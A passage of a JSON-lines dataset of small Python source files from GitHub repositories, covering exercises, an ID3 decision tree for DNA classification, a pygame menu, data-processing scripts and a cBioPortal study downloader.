calc.Addition(totalSquared,calc.Exponentiation(float(number),2))\r\n average = calc.Division(total,N)\r\n stdDevAverage = calc.Multiplication(N,calc.Exponentiation(average,2))\r\n stdDev = calc.Root(calc.Division(calc.Subtraction(totalSquared,stdDevAverage),N-1),2)\r\n print(stdDev)\r\n return None\r\n\r\n\r\n","repo_name":"Ruuza/ivs_project2","sub_path":"src/standard_deviation/standard_dev_lib.py","file_name":"standard_dev_lib.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"21036846380","text":"def examination(move):\n \"\"\"Проверка правильности входных данных\"\"\"\n valid_squares = [f + r for r in '12345678' for f in 'ABCDEFGH']\n if len(move) != 5:\n return False\n if move[:2] not in valid_squares or move[3:] not in valid_squares:\n return False\n if move[2] != '-':\n return False\n return True\n\ndef is_valid_knight_move(move):\n \"\"\"Проверка правильности хода\"\"\"\n file_diff = abs(ord(move[0]) - ord(move[3]))\n rank_diff = abs(int(move[1]) - int(move[4]))\n if file_diff == 1 and rank_diff == 2:\n return True\n if file_diff == 2 and rank_diff == 1:\n return True\n return False\n\n\nif __name__ == '__main__':\n\n move = input()\n if examination(move):\n if is_valid_knight_move(move):\n print('YES')\n else:\n print('NO')\n else:\n print('ERROR')\n","repo_name":"Dagvello/Beginner_course","sub_path":"lessons/Knight_move.py","file_name":"Knight_move.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"34113275278","text":"class Solution:\n def uniquePaths(self, m: int, n: int) -> int:\n grid = [[0]*n for _ in range(m)]\n grid[0][0] = 1\n for i in range(m):\n for j in range(n):\n if i + 1 < m:\n grid[i+1][j] += grid[i][j]\n if j + 1 < n:\n grid[i][j+1] += grid[i][j]\n return grid[-1][-1]\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n m, n = 3, 7\n print(sol.uniquePaths(m, n))\n","repo_name":"kazu0716/programing_training","sub_path":"leetcode/62.py","file_name":"62.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"25575613396","text":"from __future__ import print_function\nfrom __future__ import unicode_literals\nfrom __future__ import division\n\nimport math\n\n\ndef gini_value(dna_data):\n \"\"\"Calculates the gini value for a set of dna data.\n\n This calculates the gini value by taking the probabilty of each classification and multiplies them together.\n\n :type dna_data: dict\n :param dna_data: Set of parsed dna data.\n\n :rtype: float\n :returns: Calculated gini_value based on the dna data.\n \"\"\"\n p_values = dna_p_value(dna_data)\n gini_value = 0\n if p_values:\n for p in p_values:\n gini_value += p*p\n return 1 - gini_value\n\n\ndef gini_gain(dna_data, values, attr):\n \"\"\"Calculates the gain for a set of dna data based on the gini value.\n\n :type dna_data: dict\n :param dna_data: Set of parsed dna data.\n\n :type values: list\n :param values: List of values to calculate the gain accross\n\n :type attr: int\n :param attr: Attribute to calculate the gain for\n\n :rtype: float\n :returns: Calculated gain based on the gini value.\n \"\"\"\n #gain = gini_value(dna_data)\n size = len(dna_data)\n sum_total = 0\n for value in values:\n subset = get_subset(dna_data, value, attr)\n if subset:\n sum_total += (len(subset)/size) * gini_value(subset)\n return gini_value(dna_data) - sum_total\n\n\ndef is_same_class(dna_data):\n \"\"\"Returns the class of the data if all the data shares the same class.\n\n :type dna_data: dict\n :param dna_data: Set of parsed dna data.\n\n :rtype: bool\n :returns: True if the dna data is all the same class, False otherwise\n \"\"\"\n clses = [dna['class'] for dna in dna_data]\n return clses.count(clses[0]) == len(clses)\n\n\ndef get_class(dna_data):\n \"\"\"Returns the class that occurs most frequently in the given dna data\n\n :type dna_data: dict\n :param dna_data: Set of parsed dna data.\n\n :rtype: str\n :returns: The most common dna class in the dna data\n \"\"\"\n cls = ''\n class_count = dna_count_class(dna_data)\n max_count = max(class_count)\n if class_count[0] is max_count:\n cls = 'EI'\n elif class_count[1] is max_count:\n cls = 'IE'\n else:\n cls = 'N'\n return cls\n\n\ndef get_subset(dna_data, value, attr):\n \"\"\"Gets a subset of the data where attr has the given value.\n\n :type dna_data: dict\n :param dna_data: Set of parsed dna data.\n\n :type values: list\n :param values: List of dna values\n\n :type attr: int\n :param attr: Attribute in the dna data\n\n :rtype: float\n :returns: Calculated gain based on the gini value.\n \"\"\"\n subset = []\n for dna in dna_data:\n if dna['attrs'][attr] == value:\n # If the value of the attribute is what we are testing, add this dna to the subset\n subset.append(dna)\n return subset\n\n\ndef info_gain(dna_data, values, attr):\n \"\"\"Calculates the information gain for the given parameters.\n\n :type dna_data: dict\n :param dna_data: Set of parsed dna data.\n\n :type values: list\n :param values: List of values to calculate the gain accross\n\n :type attr: int\n :param attr: Attribute to calculate the gain for\n\n :rtype: float\n :returns: The calculated information gain for the given parameters.\n \"\"\"\n sum_total = 0\n for value in values:\n subset = get_subset(dna_data, value, attr)\n if subset:\n sum_total += (len(subset) / len(dna_data)) * entropy(subset)\n\n return entropy(dna_data) - sum_total\n\n\ndef info_gain_ratio(dna_data, values, attr):\n \"\"\"Calculates the information gain for the given parameters.\n\n :type dna_data: dict\n :param dna_data: Set of parsed dna data.\n\n :type values: list\n :param values: List of values to calculate the gain accross\n\n :type attr: int\n :param attr: Attribute to calculate the gain for\n\n :rtype: float\n :returns: The calculated information gain for the given parameters.\n \"\"\"\n gain_total = 0\n split_total = 0\n dna_total = len(dna_data)\n for value in values:\n subset = get_subset(dna_data, value, attr)\n if subset:\n ratio = len(subset) / dna_total\n split_total -= ratio * math.log(ratio, 2)\n gain_total += ratio * entropy(subset)\n\n if split_total != 0:\n gain = (entropy(dna_data) - gain_total) / split_total\n else:\n gain = entropy(dna_data) - gain_total\n return gain\n\n\ndef dna_p_value(dna_data):\n \"\"\"Calculates probabilty of each of the 3 classes for a set of strands.\n\n :type dna_data: dict\n :param dna_data: Set of parsed dna data.\n\n :rtype: tuple\n :returns: A tuple of the probability for (EI, IE, N)\n \"\"\"\n ei_count = 0\n ie_count = 0\n n_count = 0\n total = len(dna_data)\n for dna in dna_data:\n if dna['class'] == 'IE':\n ie_count += 1\n elif dna['class'] == 'EI':\n ei_count += 1\n else:\n n_count += 1\n try:\n return (ei_count/total, ie_count/total, n_count/total)\n except ZeroDivisionError:\n print (\"empty list cannot produce probability\")\n\n\ndef dna_count_class(dna_data):\n \"\"\"counts the number of each class and returns them in this order - ei, ie\n and n.\n\n :type dna_data: dict\n :param dna_data: Set of parsed dna data.\n\n :rtype: tuple\n :returns: A tuple of the counts for (EI, IE, N)\n \"\"\"\n ei_count = 0\n ie_count = 0\n n_count = 0\n for dna in dna_data:\n if dna['class'] == 'IE':\n ie_count += 1\n elif dna['class'] == 'EI':\n ei_count += 1\n else:\n n_count += 1\n return (ei_count, ie_count, n_count)\n\n\ndef entropy(dna_data):\n \"\"\"Calculates the entropy for a set of dna data\n\n :type dna_data: dict\n :param dna_data: Set of parsed dna data.\n\n :rtype: float\n :returns: The calculated entropy for a set of dna data\n \"\"\"\n p_values = dna_p_value(dna_data)\n\n total = 0\n for p in p_values:\n if p != 0:\n total -= p * math.log(p, 2)\n return total\n\n\ndef rej_null_hyp(pNode, dof, alpha):\n \"\"\"Calculates the counts needed to use chi_square.\n\n :type pNode: ID3Node\n :param pNode: Node to calculate chi squared for\n\n :type dof: int\n :param dof: Degrees of freedom of the data\n\n :type alpha: float\n :param alpha: alpha value to use in the lookup table\n\n :rtype: bool\n :returns: Whether or not to split at the given branch\n \"\"\"\n p_values = dna_p_value(pNode.dna_data)\n e_count = []\n r_count = []\n for child in pNode.children:\n child_total = 0\n class_count = dna_count_class(child.dna_data)\n r_count.append(class_count[0])\n r_count.append(class_count[1])\n r_count.append(class_count[2])\n child_total = sum(class_count)\n e_count.append(p_values[0]*child_total)\n e_count.append(p_values[1]*child_total)\n e_count.append(p_values[2]*child_total)\n return chi_square(e_count, r_count, dof, alpha)\n\n\ndef chi_square(e_count, r_count, dof, alpha):\n \"\"\"takes the a list of expected counts for IE, EI and N\n (can be fractions) and the real counts.\n\n :type e_count: int\n :param e_count: e_count value\n\n :type r_count: int\n :param r_count: r_count value\n\n :type dof: int\n :param dof: Degrees of freedom of the data\n\n :type alpha: float\n :param alpha: alpha value to use in the lookup table\n\n :rtype: bool\n :returns: The result of the chi squared test\n \"\"\"\n x2 = chi_sq_dist(dof, alpha)\n xc2 = 0\n for i in range(len(e_count)):\n if e_count[i] != 0:\n xc2 += ((r_count[i] - e_count[i])**2) / e_count[i]\n # also tried not adding r_count submission score was unchanged\n\n # reject null hypothesis\n return not xc2 > x2\n\n\ndef chi_sq_dist(dof, alpha):\n \"\"\"Calculates the critical value for chi squared.\n\n\n :type dof: int\n :param dof: Degrees of freedom of the data\n\n :type alpha: float\n :param alpha: alpha value to use in the lookup table\n\n :rtype: float\n :returns: The critical value based on the lookup table\n \"\"\"\n dof6 = [\n {'alpha': 0.20, 'crit_val': 8.558},\n {'alpha': 0.10, 'crit_val': 10.645},\n {'alpha': 0.05, 'crit_val': 12.592},\n {'alpha': 0.025, 'crit_val': 14.449},\n {'alpha': 0.02, 'crit_val': 15.033},\n {'alpha': 0.01, 'crit_val': 16.812},\n {'alpha': 0.005, 'crit_val': 18.548},\n {'alpha': 0.002, 'crit_val': 20.791},\n {'alpha': 0.001, 'crit_val': 22.458}\n ]\n\n dof14 = [\n {'alpha': 0.20, 'crit_val': 18.151},\n {'alpha': 0.10, 'crit_val': 21.064},\n {'alpha': 0.05, 'crit_val': 23.685},\n {'alpha': 0.025, 'crit_val': 26.119},\n {'alpha': 0.02, 'crit_val': 26.873},\n {'alpha': 0.01, 'crit_val': 29.141},\n {'alpha': 0.005, 'crit_val': 31.319},\n {'alpha': 0.002, 'crit_val': 34.091},\n {'alpha': 0.001, 'crit_val': 36.123}\n ]\n\n dofX = []\n if dof == 6:\n dofX = dof6\n elif dof == 14:\n dofX = dof14\n else:\n print (\"Unsupported degree of freedom used!\")\n return 0\n\n for cv in dofX:\n if cv['alpha'] == alpha:\n return cv['crit_val']\n return 0\n\n\nclass ID3Tree(object):\n root = None\n\n def __init__(self, dna_data=[], use_gini_index=False, alpha=0):\n self.root = ID3Node(None,\n dna_data=dna_data,\n use_gini_index=use_gini_index,\n alpha=alpha)\n\n if dna_data:\n self.create_tree()\n return\n\n def create_tree(self):\n \"\"\"Creates a new decision tree based on the given data.\"\"\"\n attrs = list(range(0, len(self.root.dna_data[0]['attrs'])))\n #values = ['A', 'G', 'T', 'C']\n values = ['A', 'G', 'T', 'C', 'D', 'N', 'S', 'R']\n self.root.create_subtree(values, attrs)\n return\n\n def classify_data(self, data):\n \"\"\"Find the classification for the given testing data.\n\n :type data: list\n :param data: Parsed testing data to classify.\n\n :rtype: list\n :returns: A classification for each data item in the testing data set.\n \"\"\"\n classification = []\n for item in data:\n idx, attrs = item.values()\n cls = self.root.get_class(attrs)\n classification.append({'id': idx,\n 'class': cls})\n return classification\n\n\nclass ID3Node(object):\n parent = None\n children = []\n\n dna_data = []\n value = ''\n attr = 0\n cls = ''\n\n use_gini_index = False\n alpha = 0\n\n def __init__(self, parent, dna_data=[], value=0,\n use_gini_index=False, alpha=0):\n self.parent = parent\n self.children = []\n\n self.value = value\n self.dna_data = dna_data\n self.use_gini_index = use_gini_index\n self.alpha = alpha\n return\n\n def is_leaf(self):\n \"\"\"Tests whether this node is a leaf node or not.\n\n :rtype: bool\n :returns: True if this is a leaf node, False otherwise\n \"\"\"\n return not self.children\n\n def is_root(self):\n \"\"\"Tests whether this node is the root.\n\n :rtype: bool\n :returns: True if this is the root node, False otherwise\n \"\"\"\n return not self.parent\n\n def add_child(self, dna_data, value):\n \"\"\"Adds a child ID3Node to this node.\"\"\"\n self.children.append(ID3Node(self,\n dna_data=dna_data,\n value=value,\n use_gini_index=self.use_gini_index,\n alpha=self.alpha))\n return\n\n def get_class(self, attrs):\n \"\"\"Gets the class for the given set of attrs.\n\n This function will parse the decision tree to find\n the class for the given set of attributes.\n\n :type attrs: string\n :param attrs: Attributes to clasify given from testing data.\n\n :rtype: string\n :returns: The classification for the given attrs,\n or None if there is not one\n \"\"\"\n if self.is_leaf():\n return self.cls\n else:\n for child in self.children:\n if child.value == attrs[self.attr]:\n return child.get_class(attrs)\n return self.cls\n\n def create_subtree(self, values, attrs):\n \"\"\"Main sub routine that creates the decision tree.\n\n :type values: list\n :param values: List of values to use for creating the tree\n\n :type attrs: str\n :param attrs: Attrs to use to create this subtree\n \"\"\"\n # If no dna data was given to this child, then use the data at the parent node\n if not self.dna_data:\n self.cls = self.parent.cls\n return\n else:\n self.cls = get_class(self.dna_data)\n\n # If no attrs are left to test, then stop making children\n # Or if the dna has all the same class\n if not attrs or is_same_class(self.dna_data):\n return\n\n # calculate the gain for each attr\n gain = []\n for attr in attrs:\n if self.use_gini_index:\n gain.append(gini_gain(self.dna_data, values, attr))\n else:\n gain.append(info_gain(self.dna_data, values, attr))\n\n # gets the attr with the largest gain value,\n # which is the attr we are going to split the tree at\n split_attr = gain.index(max(gain))\n self.attr = attrs[split_attr]\n attrs.remove(self.attr)\n\n # create children the get a subset of the data\n # based on the value of the data at the split attr\n for value in values:\n split_data = get_subset(self.dna_data, value, self.attr)\n self.add_child(split_data, value)\n\n #dof = len(values) - 1\n dof = 2 * (len(values) - 1)\n if rej_null_hyp(self, dof, self.alpha):\n # prunechildren\n self.children = []\n return\n\n # Recursively create subtrees\n for child in self.children:\n child.create_subtree(values, attrs)\n return\n","repo_name":"alexebaker/decision-trees","sub_path":"decision_tree/id3.py","file_name":"id3.py","file_ext":"py","file_size_in_byte":14196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"26355635382","text":" \n# 2. Create a dictionary, freq, that displays each character in string str1 as the key and its frequency as the value.\n\nfrom collections import Counter\n\nstr1 = \"peter piper picked a peck of pickled peppers\"\nfreq = Counter(str1)\n\nfor i in str1:\n print(i, freq[i])\n \n# 3. Provided is a string saved to the variable name s1.\n# Create a dictionary named counts that contains each letter in s1 and the number of times it occurs.\n\ns1 = \"hello\"\n\ndef char_frequency(s1):\n dict = {}\n for n in s1:\n keys = dict.keys()\n if n in keys:\n dict[n] += 1\n else:\n dict[n] = 1\n return dict\n\ncounts = char_frequency(s1)\nprint(counts)\n","repo_name":"gowtham957/python3M","sub_path":"Cs2_ass3_2&3.py","file_name":"Cs2_ass3_2&3.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"22532811828","text":"from __future__ import print_function\nimport numpy as np\nfrom sklearn import datasets, linear_model\n\nfrom genetic_selection import GeneticSelectionCV\nimport pandas as pd\n\ndef main():\n data = pd.read_csv('predict_house.csv')\n # Some noisy data not correlated\n E = np.random.uniform(0, 0.1, size=(len(data), 20))\n\n X = data.iloc[:, 0:79]\n y = data.iloc[:, -1]\n\n estimator = linear_model.LogisticRegression(solver=\"liblinear\", multi_class=\"ovr\")\n\n selector = GeneticSelectionCV(estimator,\n cv=5,\n verbose=1,\n scoring=\"accuracy\",\n max_features=5,\n n_population=50,\n crossover_proba=0.5,\n mutation_proba=0.2,\n n_generations=40,\n crossover_independent_proba=0.5,\n mutation_independent_proba=0.05,\n tournament_size=3,\n n_gen_no_change=10,\n caching=True,\n n_jobs=-1)\n selector = selector.fit(X, y)\n kq = selector.predict(X)\n j = 0\n for i in y:\n print(i)\n print(kq[j])\n print()\n j = j + 1\n\nif __name__ == \"__main__\":\n main()","repo_name":"NguyenQuyPhuc20173302/MachineLearningBasic","sub_path":"FeatrueSelectionGA/Genetic.py","file_name":"Genetic.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"21204960578","text":"# 10162 전자레인지\n# https://www.acmicpc.net/problem/10162\nt = int(input())\n\na,b,c = 0, 0, 0\n\nwhile t != 0:\n if t >= 300:\n t -= 300\n a += 1\n elif t >= 60:\n t -= 60\n b += 1\n elif t >= 10:\n t -= 10\n c += 1\n elif t%10 != 0:\n break\n\nif t != 0:\n print(-1)\nelse:\n print(a,b,c)","repo_name":"BOLTB0X/DataStructure_Argolithm","sub_path":"BOJ/Greedy/10162/10162.py","file_name":"10162.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"73134876485","text":"from game.animations import SinWave\nimport pygame\nfrom game.global_state import Global\n\n\nclass TitleText:\n def __init__(self) -> None:\n self.glow = Global()\n self.wave = SinWave(0.03)\n self.font = pygame.font.Font(None, 75)\n self.text = \"Ping Pong\"\n self.surf = self.font.render(self.text, True, \"white\")\n self.rect = self.surf.get_rect(center=self.glow.SCRECT.center)\n self.pos = pygame.Vector2(self.rect.topleft[0], self.rect.topleft[1] - 150)\n self.speed_scalar = 20\n\n def update(self):\n self.pos.y += self.glow.dt * self.wave.val() * self.speed_scalar\n\n def draw(self):\n self.glow.screen.blit(self.surf, self.pos)\n\n\nclass Button:\n FONT = pygame.font.Font(None, 40)\n PAD_Y = -50\n PAD_SEGMENT = 20\n ORG_SPACE_Y = 20\n SPACE_Y = ORG_SPACE_Y\n HOVER_SPEED = 30\n\n def __init__(self, title: str, statename: str = \"\") -> None:\n self.title = title\n self.glow = Global()\n self.wave = SinWave(0.1)\n self.gen_title(\"white\")\n self.rect = self.surf.get_rect(center=self.glow.SCRECT.center)\n self.rect.y += Button.PAD_Y + Button.SPACE_Y\n Button.SPACE_Y += self.rect.height + Button.PAD_SEGMENT\n self.pos = pygame.Vector2(self.rect.topleft)\n self.original_pos = self.pos.copy()\n self.statename = statename\n\n def gen_title(self, color):\n self.color = color\n self.surf = self.FONT.render(self.title, True, color)\n\n def handle_selection(self):\n for event in self.glow.events:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n self.glow.transition.start(self.statename)\n\n def update(self):\n if self.color == \"yellow\":\n self.pos.y += self.wave.val() * self.HOVER_SPEED * self.glow.dt\n self.handle_selection()\n else:\n self.pos = self.original_pos.copy()\n\n self.rect.topleft = self.pos\n\n def draw(self):\n self.glow.screen.blit(self.surf, self.rect)\n\n\nclass Buttons:\n def __init__(self) -> None:\n Button.SPACE_Y = Button.ORG_SPACE_Y\n self.btns = [\n Button(\"< Play >\", statename=\"maingame\"),\n Button(\"< Settings >\"),\n Button(\"< Credits >\"),\n ]\n self.current_btn_index = 0\n self.glow = Global()\n\n @property\n def current_btn_index(self):\n return self.__current_btn_index\n\n @current_btn_index.setter\n def current_btn_index(self, val):\n if val < 0:\n val = len(self.btns) - 1\n if val >= len(self.btns):\n val = 0\n self.__current_btn_index = val\n self.current_btn = self.btns[self.current_btn_index]\n self.current_btn.gen_title(\"yellow\")\n\n def update(self):\n for event in self.glow.events:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n self.current_btn_index -= 1\n elif event.key == pygame.K_DOWN:\n self.current_btn_index += 1\n\n for index, btn in enumerate(self.btns):\n if index != self.current_btn_index and btn.color != \"white\":\n btn.gen_title(\"white\")\n btn.update()\n\n def draw(self):\n for btn in self.btns:\n btn.draw()\n","repo_name":"blankRiot96/ping-pong","sub_path":"game/main_menu.py","file_name":"main_menu.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"40716891788","text":"import re\nimport os\n\nprint(\"Start test\")\n\nrootdir = r\"D:\\data\\cervix\\patients\"\n\nfor i, s in enumerate(m42.scan):\n # Save scans\n patient = s.url[int(re.search(r\":[0-9]+\\.\", s.url).start())+1:int(re.search(r\":[0-9]+\\.\", s.url).end())-1]\n s.writenifti(rootdir + \"\\\\\" + patient + \"\\\\\" + s.alias)\n print(s.alias)\n","repo_name":"liuhd073/thesis_cbct_seg_code","sub_path":"data_collection/match42/save_images.py","file_name":"save_images.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"42521623542","text":"import streamlit as st\nfrom PIL import Image\n\nwith st.expander(\"Start Camera\"):\n camera_img = st.camera_input(\"Camera\")\n\n\nif camera_img:\n img = Image.open(camera_img)\n\n gray_img = img.convert(\"L\")\n\n st.image(gray_img)\n","repo_name":"ofirzvishaboo/my-todo-web","sub_path":"bonus/bonus19.py","file_name":"bonus19.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"13055788567","text":"import pandas as pd\nimport regex as re\n\njobs = pd.read_csv('processed-data/df_cleaned.csv')\n\n# rename column and remove punctuation - these to the cleanup job instead of here?\njobs.rename(columns={'Skills required': 'description'}, inplace=True)\njobs[\"description\"] = jobs['description'].str.replace(r'[^\\w\\s]+', ' ')\n\n\ndef load_skills(path):\n file = open(path, \"r\")\n try:\n content = file.read()\n skills = content.split(\",\")\n finally:\n file.close()\n\n return skills\n\n\ndef calculate_skills(data, skill_list, skill_name):\n skill_counts = []\n for skill in skill_list:\n expr = '\\\\b' + skill + '\\\\b'\n result_set = data[data['description'].str.contains(expr, flags=re.IGNORECASE, regex=True)]\n count = len(result_set.index)\n skill_counts.append([skill, count, (count / len(data.index)) * 100])\n\n result = pd.DataFrame(skill_counts, columns=[skill_name, 'Count', 'Percentage'])\n result.sort_values(by=['Count'], ascending=False, inplace=True)\n\n return result\n\n\nlangs_list = load_skills('resources/skills_programming_languages_onegram.txt')\nlangs_count = calculate_skills(jobs, langs_list, 'Language')\n\nds_list = load_skills('resources/skills_datastores_onegram.txt')\nds_count = calculate_skills(jobs, ds_list, 'Data Store')\n\ndf_list = load_skills('resources/skills_dataformats_onegram.txt')\ndf_count = calculate_skills(jobs, df_list, 'Data Format')\n\ncp_list = load_skills('resources/skills_cloudproviders_onegram.txt')\ncp_count = calculate_skills(jobs, cp_list, 'Cloud Provider')\n\nga_list = load_skills('resources/skills_general_analytics_onegram.txt')\nga_count = calculate_skills(jobs, ga_list, 'General Data Processing')\n\nap_list = load_skills('resources/skills_analytics_products_onegram.txt')\nap_count = calculate_skills(jobs, ap_list, 'Analytics Product')\n\naws_list = load_skills('resources/skills_awsservices_onegram.txt')\naws_count = calculate_skills(jobs, aws_list, 'AWS Service')\n\n# print(langs_count)\n# print(ds_count)\n# print(df_count)\n# print(cp_count)\n# print(ga_count)\n# print(ap_count)\n# print(aws_count)\n\nlangs_count.to_csv('processed-data/skill-counts-programming-languages.csv')\nds_count.to_csv('processed-data/skill-counts-data-stores.csv')\ndf_count.to_csv('processed-data/skill-counts-data_formats.csv')\ncp_count.to_csv('processed-data/skill-counts-cloud-providers.csv')\nga_count.to_csv('processed-data/skill-counts-general-analytics.csv')\nap_count.to_csv('processed-data/skill-counts-analytics-products.csv')\naws_count.to_csv('processed-data/skill-counts-aws-services.csv')\n","repo_name":"homander/ids2020","sub_path":"src/skill_counts.py","file_name":"skill_counts.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"37692250381","text":"import argparse\nimport os\n\nfrom typing import List\n\nfrom post_processor.file import JsonFile, File\nfrom post_processor.file_processor import MetadataProcessor, DescriptorProcessor, LinkProcessor, \\\n ProcessMetadataProcessor, DataProcessor, JsonFileProcessor\nfrom post_processor.util import get_json_file_paths, get_file_paths, dump_json\nfrom post_processor.uuid_tracker import UuidTracker\n\n\nclass PostProcessor:\n def __init__(self, project_dir_path: str, new_dir_path: str = None):\n self.project_dir_path = project_dir_path\n self.new_dir_path = os.getcwd() if not new_dir_path else new_dir_path\n self.uuid_tracker = UuidTracker()\n\n self.processed_files_by_file_path = {}\n\n def process(self):\n self.process_json_files(f'{self.project_dir_path}/metadata',\n MetadataProcessor(self.project_dir_path, self.new_dir_path, self.uuid_tracker))\n self.process_json_files(f'{self.project_dir_path}/descriptors',\n DescriptorProcessor(self.project_dir_path, self.new_dir_path, self.uuid_tracker))\n self.process_json_files(f'{self.project_dir_path}/links',\n LinkProcessor(self.project_dir_path, self.new_dir_path, self.uuid_tracker))\n self.process_json_files(f'{self.project_dir_path}/metadata/process',\n ProcessMetadataProcessor(self.project_dir_path, self.new_dir_path, self.uuid_tracker))\n\n self.save_files()\n\n self.process_data_files(f'{self.project_dir_path}/data',\n DataProcessor(self.project_dir_path, self.new_dir_path, self.uuid_tracker))\n\n def process_json_files(self, dir_path: str, processor: JsonFileProcessor):\n json_files = self.find_json_files(dir_path)\n for json_file in json_files:\n processor.process(json_file)\n self.processed_files_by_file_path[json_file.file_path] = json_file\n\n def find_json_files(self, dir_path: str) -> List['JsonFile']:\n entity_files = (JsonFile(file_path) for file_path in get_json_file_paths(dir_path))\n return entity_files\n\n def save_files(self):\n for file_path in self.processed_files_by_file_path:\n file: JsonFile = self.processed_files_by_file_path.get(file_path)\n os.makedirs(file.new_dir_path, exist_ok=True)\n dump_json(file.new_content, file.new_file_path)\n\n def process_data_files(self, dir_path: str, processor: DataProcessor):\n entity_files = self.find_data_files(dir_path)\n for entity_file in entity_files:\n processor.process(entity_file)\n\n def find_data_files(self, dir_path: str) -> List['File']:\n entity_files = (File(file_path) for file_path in get_file_paths(dir_path))\n return entity_files\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument('path', help=\"Project directory path\", metavar=\"FILE\")\n args = parser.parse_args()\n\n if \"~\" in args.path:\n path = os.path.expanduser(args.path)\n else:\n path = args.path\n\n post_processor = PostProcessor(path)\n post_processor.process()\n","repo_name":"HumanCellAtlas/schema-test-data","sub_path":"src/post_process.py","file_name":"post_process.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"38673987400","text":"import csv\nfrom concurrent.futures import as_completed\nfrom concurrent.futures.thread import ThreadPoolExecutor\n\nfrom requests import get\n\nfrom pypgatk.toolbox.exceptions import AppException\nfrom pypgatk.toolbox.general import ParameterConfiguration, check_create_folders, download_file, clear_cache\nfrom pypgatk.toolbox.rest import call_api, call_api_raw\n\n\nclass CbioPortalDownloadService(ParameterConfiguration):\n CONFIG_KEY_DATA_DOWNLOADER = 'cbioportal_data_downloader'\n CONFIG_KEY_CBIOPORTAL_DOWNLOAD_URL = 'cbioportal_download_url'\n CONFIG_OUTPUT_DIRECTORY = 'output_directory'\n CONFIG_CBIOPORTAL_API = 'cbioportal_api'\n CONFIG_CBIOPORTAL_API_SERVER = 'base_url'\n CONFIG_CBIOPORTAL_API_CANCER_STUDIES = \"cancer_studies\"\n CONFIG_LIST_STUDIES = \"list_studies\"\n CONFIG_MULTITHREADING = \"multithreading\"\n\n def __init__(self, config_file, pipeline_arguments):\n \"\"\"\n Init the class with the specific parameters.\n :param config_file configuration file\n :param pipeline_arguments pipelines arguments\n \"\"\"\n super(CbioPortalDownloadService, self).__init__(self.CONFIG_KEY_DATA_DOWNLOADER, config_file,\n pipeline_arguments)\n\n self._cbioportal_studies = []\n if self.CONFIG_OUTPUT_DIRECTORY in self.get_pipeline_parameters():\n self._local_path_cbioportal = self.get_pipeline_parameters()[self.CONFIG_OUTPUT_DIRECTORY]\n else:\n self._local_path_cbioportal = self.get_default_parameters()[self.CONFIG_KEY_DATA_DOWNLOADER][\n self.CONFIG_OUTPUT_DIRECTORY]\n\n self._list_studies = self.get_default_parameters()[self.CONFIG_KEY_DATA_DOWNLOADER][self.CONFIG_LIST_STUDIES]\n if self.CONFIG_LIST_STUDIES in self.get_pipeline_parameters():\n self._list_studies = self.get_pipeline_parameters()[self.CONFIG_LIST_STUDIES]\n\n self._multithreading = self.get_default_parameters()[self.CONFIG_KEY_DATA_DOWNLOADER][\n self.CONFIG_MULTITHREADING]\n if self.CONFIG_MULTITHREADING in self.get_pipeline_parameters():\n self._multithreading = self.get_pipeline_parameters()[self.CONFIG_MULTITHREADING]\n\n self.prepare_local_cbioportal_repository()\n\n def prepare_local_cbioportal_repository(self):\n self.get_logger().debug(\"Preparing local cbioportal repository, root folder - '{}'\".format(\n self.get_local_path_root_cbioportal_repo()))\n check_create_folders([self.get_local_path_root_cbioportal_repo()])\n self.get_logger().debug(\n \"Local path for cbioportal Release - '{}'\".format(self.get_local_path_root_cbioportal_repo()))\n\n def get_local_path_root_cbioportal_repo(self):\n return self._local_path_cbioportal\n\n def get_cancer_studies(self):\n \"\"\"\n This method will print the list of all cancer studies for the user.\n :return:\n \"\"\"\n server = self.get_default_parameters()[self.CONFIG_KEY_DATA_DOWNLOADER][self.CONFIG_CBIOPORTAL_API][\n self.CONFIG_CBIOPORTAL_API_SERVER]\n endpoint = self.get_default_parameters()[self.CONFIG_KEY_DATA_DOWNLOADER][self.CONFIG_CBIOPORTAL_API][\n self.CONFIG_CBIOPORTAL_API_CANCER_STUDIES]\n self._cbioportal_studies = call_api_raw(server + \"?\" + endpoint).text\n return self._cbioportal_studies\n\n def download_study(self, download_study):\n \"\"\"\n This function will download a study from cBioPortal using the study ID\n :param download_study: Study to be download, if the study is empty or None, all the studies will be\n downloaded.\n :return: None\n \"\"\"\n\n clear_cache()\n\n if self._cbioportal_studies is None or len(self._cbioportal_studies) == 0:\n self.get_cancer_studies()\n\n if 'all' not in download_study:\n if not self.check_study_identifier(download_study):\n msg = \"The following study accession '{}' is not present in cBioPortal Studies\".format(download_study)\n self.get_logger().debug(msg)\n raise AppException(msg)\n else:\n self.download_one_study(download_study)\n else:\n 